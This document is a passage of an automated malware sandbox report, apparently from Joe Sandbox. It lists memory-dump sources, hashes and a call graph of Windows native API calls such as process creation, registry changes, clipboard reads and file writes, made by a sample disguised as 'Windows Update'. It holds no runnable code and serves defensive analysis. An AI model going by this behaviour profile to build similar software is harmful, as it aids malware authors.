              • Opcode ID: d0e3e746eda1377066b230e3229f49fdeb22a117cb88364e8e1f0ac82eb82cac
              • Instruction ID: ea52197baf1749cfb3da05e3b50c9413d8e5908b5c823d48f536d1502a6f1649
              • Opcode Fuzzy Hash: d0e3e746eda1377066b230e3229f49fdeb22a117cb88364e8e1f0ac82eb82cac
              • Instruction Fuzzy Hash:
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: Unload
              • String ID:
              • API String ID: 3485584074-0
              • Opcode ID: c907b8f7601954ef58b4e988eba2dc7536efaeb1a99efda86d5778dc0492c16c
              • Instruction ID: b97b2a9ecab8e95a6f1aee9c8ca93a824c27ee0ed117ec9d3ea2211f102471f4
              • Opcode Fuzzy Hash: c907b8f7601954ef58b4e988eba2dc7536efaeb1a99efda86d5778dc0492c16c
              • Instruction Fuzzy Hash:
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true
              • Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_4_2_9a0000_server.jbxd
              Similarity
              • API ID: DeleteFile
              • String ID:
              • API String ID: 4033686569-0
              • Opcode ID: de41231265badbf803c2ee5e705c5bf7a521e56d635e5efce78eab7eadf26aae
              • Instruction ID: 9432402e7a9b4c16e93516227f6ebe297f14446baaae1c4927d1e31f10a52577
              • Opcode Fuzzy Hash: de41231265badbf803c2ee5e705c5bf7a521e56d635e5efce78eab7eadf26aae
              • Instruction Fuzzy Hash:

              Execution Graph

              Execution Coverage:12.6%
              Dynamic/Decrypted Code Coverage:22.2%
              Signature Coverage:0%
              Total number of Nodes:203
              Total number of Limit Nodes:3
              execution_graph 6639 a290a2 6640 a290c6 NtQuerySecurityObject 6639->6640 6641 a290b8 6639->6641 6640->6641 6763 a29522 6764 a29537 NtSaveKey 6763->6764 6765 a2952d 6763->6765 6583 b505b4 6586 b505d8 6583->6586 6584 b5063f GlobalAddAtomA 6585 b50655 6584->6585 6586->6584 6722 a291a3 NtFlushBuffersFile 6723 a29ba0 6726 a29958 6723->6726 6725 a29bab 6727 a29961 6726->6727 6728 a2996a NtClose 6726->6728 6727->6725 6727->6728 6728->6725 6587 122aaa6 6588 122aade CreateFileW 6587->6588 6590 122ab2d 6588->6590 6729 a297a6 NtDeleteFile 6642 a294a4 6643 a294cb NtQueryMultipleValueKey 6642->6643 6644 a294b9 6642->6644 6643->6644 6673 a29024 6674 a29041 NtOpenKeyEx 6673->6674 6675 a29034 6673->6675 6674->6675 6596 122afaa 6597 122afe2 CreateMutexW 6596->6597 6599 122b025 6597->6599 6645 a28ea8 6646 a28ed7 NtCreateThread 6645->6646 6647 a28ebd 6645->6647 6646->6647 6730 a297ae 6731 a297e7 NtLockFile 6730->6731 6732 a297c5 6730->6732 6731->6732 6648 a292ac 6649 a292d3 NtQueryValueKey 6648->6649 6650 a292c1 6648->6650 6649->6650 6676 a2922c NtOpenKey 6733 122a433 6734 122a45a DuplicateHandle 6733->6734 6736 122a4a6 6734->6736 6651 a298b0 6652 a298e7 NtMapViewOfSection 6651->6652 6653 a298c5 6651->6653 6652->6653 6677 a29630 6678 a29645 6677->6678 6679 a2966b NtQueryDirectoryFile 6677->6679 6679->6678 6766 a29130 6767 a29167 NtFsControlFile 6766->6767 6768 a29145 6766->6768 6767->6768 6680 a29236 6681 a2925f NtEnumerateValueKey 6680->6681 6682 a2924d 6680->6682 6681->6682 6737 122ac37 6739 122ac6a GetFileType 6737->6739 6740 122accc 6739->6740 6769 a29334 6770 a2935b NtEnumerateKey 6769->6770 6771 a29349 6769->6771 6770->6771 6683 a29438 NtLoadKey2 6684 122a9bf 6685 122a9c9 SetErrorMode 6684->6685 6687 122aa53 6685->6687 6741 a291bf NtExtendSection 6742 a28fbc 6743 a28fd1 6742->6743 6744 a28ff7 NtCreateUserProcess 6742->6744 6744->6743 6772 a29502 6773 a29518 NtRestoreKey 6772->6773 6774 a2950d 6772->6774 6688 a29406 6689 a29411 6688->6689 6690 a2941b NtLoadKey 6688->6690 6745 a29586 6746 a29591 6745->6746 6747 a2959b NtTerminateProcess 6745->6747 6691 a29c0a 6694 a299a8 6691->6694 6695 a299ca NtQueryInformationFile 6694->6695 6696 a299bc 6694->6696 6695->6696 6775 a28f0b NtResumeThread 6697 122a58e 6698 122a5ee OleGetClipboard 6697->6698 6700 122a64c 6698->6700 6776 a2970c NtOpenSection 6614 122aa12 6615 122aa3e SetErrorMode 6614->6615 6617 122aa67 6614->6617 6616 122aa53 6615->6616 6617->6615 6701 a29810 6702 a29832 NtUnlockFile 6701->6702 6703 a29824 6701->6703 6702->6703 6777 a29910 6778 a29925 6777->6778 6779 a2993b NtCreateSection 6777->6779 6779->6778 6780 a29716 6781 a29743 NtDuplicateObject 6780->6781 6782 a2972d 6780->6782 6781->6782 6783 a28f14 6784 a28f43 NtCreateProcess 6783->6784 6785 a28f29 6783->6785 6784->6785 6625 a29c98 6626 a29cb3 6625->6626 6629 a29974 6626->6629 6630 a29996 NtSetInformationFile 6629->6630 6631 a29988 6629->6631 6630->6631 6654 a29098 NtSetSecurityObject 6655 a29698 6656 a296cf NtQueryDirectoryFileEx 6655->6656 6657 a296ad 6655->6657 6656->6657 6632 122a51e 6633 122a580 6632->6633 6634 122a54a OleInitialize 6632->6634 6633->6634 6635 122a558 6634->6635 6658 a29a9c 6659 a29ac3 NtOpenFile 6658->6659 6660 a29ab1 6658->6660 6659->6660 6786 a29760 6787 a29782 NtQueryVolumeInformationFile 6786->6787 6788 a29774 6786->6788 6787->6788 6789 a28f64 6790 a28f97 NtCreateProcessEx 6789->6790 6791 a28f79 6789->6791 6790->6791 6595 a2996a NtClose 6600 a29de8 6601 a29e13 6600->6601 6604 a29a34 6601->6604 6603 a29e6b 6605 a29a49 6604->6605 6606 a29a6f NtCreateFile 6604->6606 6605->6603 6606->6605 6610 122adee 6612 122ae23 WriteFile 6610->6612 6613 122ae55 6612->6613 6661 a29aef NtQueryAttributesFile 6792 b50578 6793 b50590 LoadStringA 6792->6793 6662 a292ec 6663 a29301 6662->6663 6664 a29317 NtCreateKey 6662->6664 6664->6663 6704 a29873 NtUnmapViewOfSection 6665 122af76 6666 122afaa CreateMutexW 6665->6666 6668 122b025 6666->6668 6795 a29374 6796 a2939b NtSetValueKey 6795->6796 6797 a29389 6795->6797 6796->6797 6748 122aa75 6750 122aaa6 CreateFileW 6748->6750 6751 122ab2d 6750->6751 6669 a294f8 NtReplaceKey 6705 a29278 6706 a2929a NtQueryKey 6705->6706 6707 a2928c 6705->6707 6706->6707 6752 a293fe NtFlushKey 6798 a2957e NtUnloadKey 6708 a2987c 6709 a29890 6708->6709 6710 a2989e NtQuerySection 6708->6710 6710->6709 6753 a295fc 6754 a29610 6753->6754 6755 a2961e NtQueryObject 6753->6755 6755->6754 6711 a29442 6712 a2947b NtNotifyChangeKey 6711->6712 6713 a29459 6711->6713 6712->6713 6799 a29540 6800 a29550 6799->6800 6801 a2955d NtSetInformationKey 6799->6801 6801->6800 6756 a293c6 NtDeleteKey 6757 a291c8 6758 a291f7 NtAccessCheck 6757->6758 6759 a291dd 6757->6759 6758->6759 6802 a29d48 6805 a295a4 6802->6805 6806 a295d7 NtWriteFile 6805->6806 6807 a295b9 6805->6807 6806->6807 6714 122adce 6716 122adee WriteFile 6714->6716 6717 122ae55 6716->6717 6760 a293ce 6761 a293e3 NtDeleteValueKey 6760->6761 6762 a293d9 6760->6762 6718 a29050 6719 a29072 NtSetVolumeInformationFile 6718->6719 6720 a29064 6718->6720 6719->6720 6618 b50540 6619 b5054d VirtualAlloc 6618->6619 6721 a29857 NtQueryFullAttributesFile 6621 122a45a 6622 122a4d0 6621->6622 6623 122a498 DuplicateHandle 6621->6623 6622->6623 6624 122a4a6 6623->6624 6670 a290d8 6671 a2910b NtNotifyChangeDirectoryFile 6670->6671 6672 a290ed 6670->6672 6671->6672 6808 a29959 6809 a29969 NtClose 6808->6809 6811 122a4de 6812 122a51e OleInitialize 6811->6812 6814 122a558 6812->6814 6636 a299dc 6637 a299f1 6636->6637 6638 a29a0f NtReadFile 6636->6638 6638->6637
              APIs
              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 00A29A24
              Memory Dump Source
              • Source File: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true
              • Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: e4824a42b8e25293820d6be86b46158b32ce7c138603fcd661a0d95aa50e5b33
              • Instruction ID: 10599cf3d8d1b5c1ede74616bdee765e942754d0465d2900928519f3744dfe77
              • Opcode Fuzzy Hash: e4824a42b8e25293820d6be86b46158b32ce7c138603fcd661a0d95aa50e5b33
              • Instruction Fuzzy Hash: 94F091B65002597FD714DE8ADCC4DA77B6CEB8D7A4B444415F71897101C230AD518770
              APIs
              • NtSetInformationFile.NTDLL(?,?,?,?,?), ref: 00A2999B
              Memory Dump Source
              • Source File: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true
              • Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID: FileInformation
              • String ID:
              • API String ID: 4253254148-0
              • Opcode ID: afabb0f23454a06752297e3cc741cf4e16a6db8a0745e292da31ce17a0f9ccf2
              • Instruction ID: 027ca49738e1e4e0eb7fbdb874e3ea479c1c3bc4a456132494475242adb27229
              • Opcode Fuzzy Hash: afabb0f23454a06752297e3cc741cf4e16a6db8a0745e292da31ce17a0f9ccf2
              • Instruction Fuzzy Hash: 4AE0ECB25042647FE72C575EAC0DDA77F6CDBD6BB1F04446DB508A3110C661AC80C6B0
              APIs
              Memory Dump Source
              • Source File: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true
              • Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: d4ec6f7fb01cc2aaf2d995b96e1417b604f62c5ceb2d01a9791ddc5e2a4a7344
              • Instruction ID: 1481e78aa76db3a7d63cc27372099d31462a981cd2ca5bc3b9ee4e440c512c29
              • Opcode Fuzzy Hash: d4ec6f7fb01cc2aaf2d995b96e1417b604f62c5ceb2d01a9791ddc5e2a4a7344
              • Instruction Fuzzy Hash: A2B092B09021502ADF0E97FC6C0D746698C6BA2302F0488A4B215F21B4CE244580D760
              APIs
              Memory Dump Source
              • Source File: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true
              • Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B5D000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B66000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B6A000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C45000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C48000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000C61000.00000040.00000001.01000000.0000000B.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_14_2_9b0000_8d9ba8e0d68a3d306883c186c2013957Windows Update.jbxd
              Similarity
              • API ID: Close
              • String ID:
              • API String ID: 3535843008-0
              • Opcode ID: 1645c620cc5dad47a2465641aa1cb02141eb359a77fe1cc1fe41ff0bafad744f
              • Instruction ID: 22eba22e7a44010fd91feccc12bdd4922fbbf8774a4325c5df2dc05293f92859
              • Opcode Fuzzy Hash: 1645c620cc5dad47a2465641aa1cb02141eb359a77fe1cc1fe41ff0bafad744f
              • Instruction Fuzzy Hash:

              Control-flow Graph

              APIs
              • GlobalAddAtomA.KERNEL32(?), ref: 00B50640
              Strings
              Memory Dump Source
              • Source File: 0000000E.00000002.2357048192.0000000000B50000.00000040.00000001.01000000.0000000B.sdmp, Offset: 009B0000, based on PE: true
              • Associated: 0000000E.00000002.2357014219.00000000009B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009C8000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.00000000009CD000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A07000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A26000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000A2C000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000ACB000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000AF7000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B01000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B08000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B15000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B17000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B1E000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B23000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B44000.00000040.00000001.01000000.0000000B.sdmpDownload File
              • Associated: 0000000E.00000002.2357048192.0000000000B55000.00000040.00000001.01000000.0000000B.sdmpDownload File
